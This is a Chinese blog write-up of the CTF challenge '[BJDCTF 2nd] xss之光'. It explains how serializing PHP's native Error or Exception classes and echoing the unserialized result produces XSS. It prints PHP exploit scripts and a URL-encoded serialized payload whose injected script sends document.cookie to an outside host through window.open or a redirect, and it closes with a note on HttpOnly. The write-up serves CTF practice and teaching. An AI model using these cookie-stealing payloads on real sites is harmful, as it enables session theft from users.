[BJDCTF 2nd]xss之光 (利用php原生类进行XSS)

最新推荐文章于 2022-03-10 23:35:14 发布
最新推荐文章于 2022-03-10 23:35:14 发布
阅读量518 收藏
点赞数
分类专栏: Web刷题记录 文章标签: php web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/111880131
版权

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

知识点

有关该题目的知识点,十分建议去看看这篇大佬的文章:https://blog.csdn.net/qq_45521281/article/details/105812056
当对象被当作一个字符串使用时候调用(不仅仅是echo的时候,比如file_exists()判断也会触发):__toString
这里的原理就是利用__toString这个魔法方法:
__toString() 方法用于一个类被当成字符串时应怎样回应。例如 echo $obj; 应该显示些什么。此方法必须返回一个字符串
先来看看以下代码:

<?php
$a = unserialize($_GET['abc']);
echo $a;
?>

exp:

<?php
$a = new Error("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
?>

如果将exp传入源码中,就会造成XSS漏洞,应该能够注意到这里创建了一个Error类,里面写入了注入代码,经过序列化过程,再直接echo出来就会造成XSS,但是Error类只适用于PHP7版本。同样有等效的原生php类还有Exception,适用于PHP5、PHP7,接下来buuctf的环境便是PHP5,需要用到该函数来完成做题。

题目

在这里插入图片描述
进到去就gungungun的,找不到任何东西,扫了扫也没发现什么,看了看wp发现居然是git泄露!草率了
用githack工具拿到源码:

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

源码就只有一个反序列化过程,但题目提示了XSS,有关XSS的题目,flag一般都在cookie里面
看到大佬做题,直接就document.cookie就能拿到flag了,根本不需要整这些花里胡哨的,我也试了试,果真如此
在这里插入图片描述
但是大佬说这种情况很少有见,几乎没有,但是思路还是值得学学 ,直接点不好吗?
由于此题是xss,所以只要xss执行window.open()就能把flag带出来

<?php
$a = new Exception("<script>window.open('http://1150fc60-3e08-4b15-80de-c13acf9300a2.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($a));
?>

运行得到

O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2F1150fc60-3e08-4b15-80de-c13acf9300a2.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A29%3A%22D%3A%5Cphpstudy_pro%5CWWW%5Cindex.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

再GET提交就可以在cookie里面拿到flag

在这里插入图片描述

也可以用window.location.href='url’来实现恶意跳转

<?php
$a = new Exception("<script>window.location.href='http://1150fc60-3e08-4b15-80de-c13acf9300a2.node3.buuoj.cn/'+document.cookie</script>");
echo urlencode(serialize($a));
?>

最后还有大佬提醒的方法,用alert直接弹出flag

<?php
$a = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($a));
?>

但是这种方法也有着限制,如果环境开启了HttpOnly,就不能这样利用。

什么是HttpOnly

如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF 2nd]xss之光 -wp
freerats的博客
08-04 486
打开容器就gungungun,其他啥也没有。 扫目录扫出git泄露 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 源码就这么短短三行。 一开始还想着是不是其他地方还会泄露另一部分源码,但是没找到。 参考其他wp才知道是利用php原生进行XSS 题目给的提示就是题目叫xss,说明需要xss。 echo unserialize($a); 可触发序列化中的魔术方法__toString Error 适用于php7版本 E
[BJDCTF 2nd]xss之光
feng的博客
11-24 203
知识点 PHP利用原生的反序列化以实现XSS WP 又是新姿势。 进入环境进行了常规的信息收集,发现存在git泄露,下载下来: <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 除了这个反序列化之外,什么都没有了。自己也是一脸蒙蔽,然后卑微的去看了WP。 这题其实是XSS,但是利用的是PHP的反序列化。主要知识点是php原生中的Error 和Exception 中内置了toString 方法, 可能造成xss
利用php原生进行XSS([BJDCTF 2nd]xss之光
qq_45521281的博客
04-28 1494
文章目录基础知识__toString 文章围绕着一个问题,如果在代码审计中有反序列化点,但是在原本的代码中找不到pop链该如何?N1CTF有一个无pop链的反序列化的题目,其中就是找到php内置进行反序列化。 基础知识 首先还是来回顾一下序列化中的魔术方法,下面也将以此进行研究。 当对象被创建的时候调用:__construct 当对象被销毁的时候调用:__destruct 当对象被当作一个字符...
xss防御之php利用httponly防xss攻击
12-19
XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,它允许攻击者在受害者的浏览器上执行恶意脚本。这种攻击通常发生在Web应用程序中,当应用程序未能充分验证或转义用户输入的数据,使得这些数据可以作为可...
利用Express模拟web安全之---xss的攻与防
01-26
XSS跨站脚本攻击】是Web应用中常见的安全漏洞之一,其全称为Cross Site Scripting。由于CSS(层叠样式表)的缩写相同,因此为了区分,将其缩写为XSS。攻击者利用XSS漏洞向网页中插入恶意的JavaScript代码,当用户...
php处理xss攻击过滤.rar
最新发布
01-18
然而,随着互联网技术的发展,安全问题也日益突出,其中XSS(跨站脚本攻击)是常见的安全威胁之一。XSS攻击允许攻击者通过注入恶意脚本到网页中,从而获取用户的敏感信息,例如登录凭据或执行其他恶意操作。为了防御...
PHP如何防止XSS攻击与XSS攻击原理的讲解
01-02
XSS又称CSS,全称Cross SiteScript(跨站脚本攻击), XSS攻击似于SQL注入攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入...
2020/7/20 -[BJDCTF 2nd]xss之光 - git源码泄露、php原生反序列化
抒情诗
07-20 585
又回来了,当初看不懂,现在看起来也很nb(Exception没了解过) 首先是个git源码泄露,开始用dirsearch扫的时候很快,但全是429,后来用了-s 延迟(单位:s)选项成功扫出.git泄露。 亲自实验-s 0.5也可以,稍微快了点。用githack下载源码,index.php 内容如下所示 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 说他是反序列化吧,我没见过这种形式的,也不太清楚;说他不是反序列化
---------已搬运-------BUUCTF:[BJDCTF 2nd]xss之光 ------------ 反序列PHP原生的应用 -----------git小操作
Zero_Adam的博客
02-25 193
目录:一、自己做:二、不足&&收获三、学习WP 一、自己做: 就到源码泄露那里,而且我自己也不会git操作。。。 -<?php -$a = $_GET['yds_is_so_beautiful']; -echo unserialize($a); 二、不足&&收获 进一步晓得了 PHP 反序列化中的原生的应用 alert(1)不行的时候,多试试别的。什么弹cookie 啊。跳转网页啊。都试试 三、学习WP 没有的情况下,可以进行原生反序列化 参考文献:反序列化
BUUCTF-CISCN-华东北赛区Web-XSS
迷风小白
09-11 4532
XSS 拿到题目出现如下界面 随便点击测试一下,发现需要注册登录,随即注册一个用户登录(admin用户不能注册) 发现有投稿和反馈这两个页面可以操作 结合标题再看看这两个页面,投稿页面是用来放XSS的,然后在反馈给管理员这样我们就能拿到管理员的cookie,因为这里是内网环境,所以只能去 http://xss.buuoj.cn 注册账号来接收cookie。 经过测试发现提交的内容部分会被转义...
ctf web方向与php学习记录16之xss初见
这周末在做梦的博客
10-09 172
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 (人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading
XSS进阶
goddemon
03-10 1860
前置知识点: ①javascript基础知识 javascript参考文档 自我理解的javascript 基础的javascript语法 html dom理解 属性 从基础的语法也可以思考到我们能够利用js进行做的一些事情了 只要具有内容 我们就可以调用js接口去获取很多东西 甚至于如果浏览器的沙箱出问题了 或者是electron的东西 调用本地资源造成rce漏洞 如 蜜罐去获取history 给我的理解就是访问一个网站后网站里面的js调用的web api去获取历史内容发送到指定的网站上去进而进
BJDCTF 2nd菜鸡做题记录
bmth666的博客
03-25 3115
文章目录 萌新赛 做了一下web,感觉还没有入门,太难了吧,然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入 这道题没写出来,想了好久才想到可以用\转义掉',然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路 username=\ password=...
XSS漏洞利用深度解析
"xss利用与挖掘" XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上注入恶意脚本。通过XSS攻击,攻击者能够窃取用户的敏感信息,如cookies,或者控制用户的浏览器行为,例如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值